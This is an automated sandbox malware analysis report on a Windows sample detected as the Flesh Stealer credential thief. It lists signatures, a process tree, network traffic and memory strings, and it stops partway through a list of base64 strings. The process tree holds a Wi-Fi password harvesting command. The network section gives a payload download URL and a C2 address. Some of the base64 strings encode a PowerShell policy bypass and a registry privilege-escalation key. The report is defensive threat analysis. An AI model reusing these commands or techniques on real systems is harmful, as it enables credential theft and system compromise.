Windows Analysis Report
iGxCM2I5u9.exe

Overview

General Information

Sample name: iGxCM2I5u9.exe
Analysis ID: 1569093
MD5: 8c6fb38b219a123b9340465b8d2dd5f8
SHA1: 35242280f551684b9e47726d5f94f1615c0dc76e
SHA256: 2960e7ad1d18bf517b5b4edf6e674e5ffdc587a8672cac0b24907a8fae8de59c
Infos:

Detection

Flesh Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Flesh Stealer
Connects to many ports of the same IP (likely port scanning)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • iGxCM2I5u9.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\iGxCM2I5u9.exe" MD5: 8C6FB38B219A123B9340465B8D2DD5F8)
    • cmd.exe (PID: 7976 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 1128 cmdline: chcp 65001 MD5: CA9A549C17932F9CAA154B5528EBD8D4)
      • netsh.exe (PID: 4536 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 3340 cmdline: findstr All MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  • cleanup
No configs have been found
Source: Process Memory Space: iGxCM2I5u9.exe PID: 7544 | Rule: JoeSecurity_FleshStealer | Description: Yara detected Flesh Stealer | Author: Joe Security

    Stealing of Sensitive Information

    Source: Process started | Author: Joe Security | Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\iGxCM2I5u9.exe", ParentImage: C:\Users\user\Desktop\iGxCM2I5u9.exe, ParentProcessId: 7544, ParentProcessName: iGxCM2I5u9.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 7976, ProcessName: cmd.exe
    No Suricata rule has matched

    AV Detection

    Source: iGxCM2I5u9.exe | Avira: detected
    Source: https://orange-loris-425181.hostingersite.com/uploads/clean.exe | Avira URL Cloud: Label: malware
    Source: iGxCM2I5u9.exe | ReversingLabs: Detection: 65%
    Source: iGxCM2I5u9.exe | Joe Sandbox ML: detected
    Source: unknown | HTTPS traffic detected: 84.32.84.100:443 -> 192.168.11.20:49756 version: TLS 1.2
    Source: iGxCM2I5u9.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\

    Networking

    Source: global traffic | TCP traffic: 89.23.100.233 ports 0,2,3,32089,8,9
    Source: global traffic | TCP traffic: 192.168.11.20:49758 -> 89.23.100.233:32089
    Source: global traffic | HTTP traffic detected: GET /uploads/clean.exe HTTP/1.1 | Host: orange-loris-425181.hostingersite.com | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: icanhazip.com | Connection: Keep-Alive
    Source: Joe Sandbox View | IP Address: 89.23.100.233
    Source: Joe Sandbox View | IP Address: 104.16.185.241
    Source: Joe Sandbox View | ASN Name: MAXITEL-ASRU
    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: unknown | DNS query: name: icanhazip.com
    Source: unknown | TCP traffic detected without corresponding DNS query: 89.23.100.233 (this entry is repeated 50 times in the report)
    Source: global traffic | DNS traffic detected: DNS query: orange-loris-425181.hostingersite.com
    Source: global traffic | DNS traffic detected: DNS query: icanhazip.com
    Source: global traffic | DNS traffic detected: DNS query: 69.170.12.0.in-addr.arpa
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 12:10:59 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | last-modified: Wed, 11 Jan 2023 12:29:40 GMT | etag: W/"999-63beabb4-5b41a25ab194c3b4;gz" | platform: hostinger | panel: hpanel | x-turbo-charged-by: LiteSpeed | Server: hcdn | x-hcdn-request-id: 209b163506b912c3746eb8f46d41577b-asc-edge5
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103293639339.000001605EBD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: iGxCM2I5u9.exe, 00000000.00000002.103292458865.000001605CFC5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://icanhazip.com
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://icanhazip.com/
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://icanhazip.com/p
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.pki.goog/gtsr100
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: iGxCM2I5u9.exe, 00000000.00000002.103292458865.000001605CFC5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F159000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF7000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1FB000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED89000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Open
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
    Source: iGxCM2I5u9.exe, 00000000.00000002.103305186713.0000016077957000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/
    Source: iGxCM2I5u9.exe, 00000000.00000002.103305186713.000001607791D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/https://login.live.com/
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED89000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
    Source: iGxCM2I5u9.exe, 00000000.00000002.103292458865.000001605CFC5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://orange-loris-425181.hostingersite.com
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://orange-loris-425181.hostingersite.com/uploads/clean.exe
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pki.goog/repository/0
    Source: tmp7AB1.tmp.dat.0.dr | String found in binary or memory: https://support.mozilla.org
    Source: tmp7AB1.tmp.dat.0.dr | String found in binary or memory: https://support.mozilla.org/en-GB/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=fire
    Source: tmp7AB1.tmp.dat.0.dr | String found in binary or memory: https://support.mozilla.org/en-GB/products/firefoxgro.allizom.troppus.
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/FleshStealer
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F159000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF7000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1FB000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F159000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF7000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1FB000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED89000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F283000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F232000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F159000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF7000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: tmp7AB1.tmp.dat.0.dr | String found in binary or memory: https://www.mozilla.org
    Source: tmp7AB1.tmp.dat.0.dr | String found in binary or memory: https://www.mozilla.org/en-GB/about/gro.allizom.www.
    Source: tmp7AB1.tmp.dat.0.dr | String found in binary or memory: https://www.mozilla.org/en-GB/contribute/gro.allizom.www.
    Source: tmp7AB1.tmp.dat.0.dr | String found in binary or memory: https://www.mozilla.org/en-GB/firefox/central/gro.allizom.www.
    Source: tmp7AB1.tmp.dat.0.dr | String found in binary or memory: https://www.mozilla.org/en-GB/privacy/firefox/gro.allizom.www.
    Source: tmp7AB1.tmp.dat.0.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
    Source: tmp7AB1.tmp.dat.0.dr | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpgk
    Source: tmp7AB1.tmp.dat.0.dr | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
    Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Code function: 0_2_00007FFBC7C5B35C
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Code function: 0_2_00007FFBC7C5C10C
    Source: iGxCM2I5u9.exe, 00000000.00000000.102048799997.000001605CE52000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSystem.exe" vs iGxCM2I5u9.exe
    Source: iGxCM2I5u9.exe | Binary or memory string: OriginalFilenameSystem.exe" vs iGxCM2I5u9.exe
    Source: iGxCM2I5u9.exe, AcohdgxumZqMtqiEyujcnGKSk.cs | Base64 encoded string: 'L2Mgc3RhcnQgL2IgcG93ZXJzaGVsbCDigJNFeGVjdXRpb25Qb2xpY3kgQnlwYXNzIFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICci', 'U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xTaGVsbFxPcGVuXGNvbW1hbmQ=', 'QUNnYktLOG8veWpmS084b1Z5ajJLRElvUVNpQUtFQW9KQ2dzS0E4b0pTZ2tLQUFvUUNocEtKSW96aWk5S1A4byt5Z3ZLQjRvQVNnZ0FBPT0=', 'QUNnQUtBQW9BQ2lKS0Iwb0V5aTdLT1FvZUNnaktFQW9BQ2dBS0FBb0FDZ0FLQ0FvR2lqMEtING9YeWdKS0NNb1FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW80Q2p6S01Zb0ZDZ0pLQThvL3loRUtMRW81Q2lFS01Bb3BDajBLRWNvOENoZktLa29BU2dnS0hRb2Z5aEVLQUFvQUNnZ0FBPT0=', 'QUNnQUtLQW9BU2lBS0E0b0FDZ0FLQmdvL0NoL0tEc29HU2pOS01Bb1BDZzVLRjhvL3lqRUtNTW9BQ2dBS0Jnb1JDZ0lLRVFvQUNnZ0FBPT0=', 'QUNnQUtBY29nQ2pzS1BZbzdDaHJLSXNvZkNpM0tGY29nQ2lYS0Frb0p5aEFLTW9vdUNqbktORW85Q2p0S1BRbzlDaEVLRGdvQUNnZ0FBPT0=', 'QUNpNEtBQW9DQ2dKS0Jzb055aitLUDhveHlqdktPY295eWlKS0gwb0RTaVpLUDBvemlqL0tQOG9KeWdmS0Fzb0FTaEdLQUFvUkNnZ0FBPT0=', 'QUNpNEtJQW9RQ2dBS0lBb1lDZ1lLSWtvZnlqL0tQOG8veWhXS0FFb3NDai9LUDhvL3lqL0tFZ29FU2dpS01Bb0FDam5LRUFvUnlnZ0FBPT0=', 'QUNnWUtFNG9EeWdXS0JNb0VpZ1NLRG9vL3loSUtMY29neWdCS0FBb0RpZzhLSDRveVNqL0tBY29BQ2dBS0Fnb2dTZ0pLS3NvQUNnZ0FBPT0=', 'QUNnQUtLRW9BQ2dRS0VBb0FDZ0FLQUFvT1NqL0tPNG9JaWhIS0FBb3VDZ1FLUFVvdnlnTEtBQW9BQ2dBS0FBb0JpZ0FLRXdvQUNnZ0FBPT0=', 'QUNnQUtBQW9veWdBS0Fnb2hDZ0FLQUFvQUNnSUtCa29SeWhHS0JBb3VDaTRLQXNvQVNnQUtBQW9BQ2dBS0Fvb0FDaGNLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dSS01Rb0FDZ1JLSVFvUUNnQUtBQW8veWptS09RbzlDaitLQUFvQUNnQUtFQW9FQ2dCS09Bb0NpZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0Fnb0VpaWtLSDhvQ0NnUUtBQW9OQ2l0S1A4bzdTZ3VLQUFvRWlncEtQNG9aQ2dhS0FFb0FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQWdvRUNnQUtDUW9BQ2lJS1BZb1dDZ0FLQ1FvRkNnQ0tBRW9BQ2dBS0FBb0FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQUFvQUNnQUtBQW9BQ2dBS0Jrb0FDZ0FLQUFvQUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQUFvQUNnZ0FDQUE=', 'Q1FBSkFEM1lzOXdnQUVNQWNnQmxBR1FBYVFCMEFFTUFZUUJ5QUdRQWN3QTZBQ0FB', 'Q1FBSkFEM1lGdDBnQUVJQWJ3QnZBR3NBYlFCaEFISUFhd0J6QURvQUlBQT0=', 'Q1FBSkFEM1k1dHdnQUVRQWJ3QjNBRzRBYkFCdkFHRUFaQUJ6QURvQUlBQT0=', 'Q1FBSkFEellxTjhnQUZJQVpRQnpBSFFBYndCeUFHVUFWQUJ2QUdzQVpRQnVBSE1BT2dBZ0FBPT0=', 'Q1FBSkFEN1l5dDBnQUZjQVlRQnNBR3dBWlFCMEFITUFPZ0FnQUE9PQ==', 'Q1FCRUp3LytJQUJYQUdFQWJBQnNBR1VBZEFCekFDQUFRUUJ3QUhBQU9nQWdBQT09', 'Q1FBKzJLTGRJQUJRQUdrQVpBQm5BR2tBYmdBZ0FFRUFjQUJ3QURvQUlBQT0=', 'Q1FBOTJIN2NJQUJFQUdrQWN3QmpBRzhBY2dCa0FDQUFWQUJ2QUdzQVpRQnVBSE1BT2dBZ0FBPT0=', 'Q1FBSUp3LytJQUJVQUdVQWJBQmxBR2NBY2dCaEFHMEFJQUJ6QUdVQWN3QnpBR2tBYndCdUFITUE=', 'Q1FBQkpnLytJQUJUQUdzQWVRQndBR1VBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FBOTJIN2NJQUJFQUdrQWN3QmpBRzhBY2dCa0FDQUFkQUJ2QUdzQVpRQnVBQT09', 'Q1FBOTJLM2NJQUJUQUdrQVp3QnVBR0VBYkFBZ0FITUFaUUJ6QUhNQWFRQnZBRzRB', 'Q1FBODJLN2ZJQUJUQUhRQVpRQmhBRzBBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FBODJLN2ZJQUJWQUhBQWJBQmhBSGtBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FDWkpnLytJQUJRQUhJQWJ3QmpBR1VBY3dCekFHVUFjd0E2QUNBQQ==', 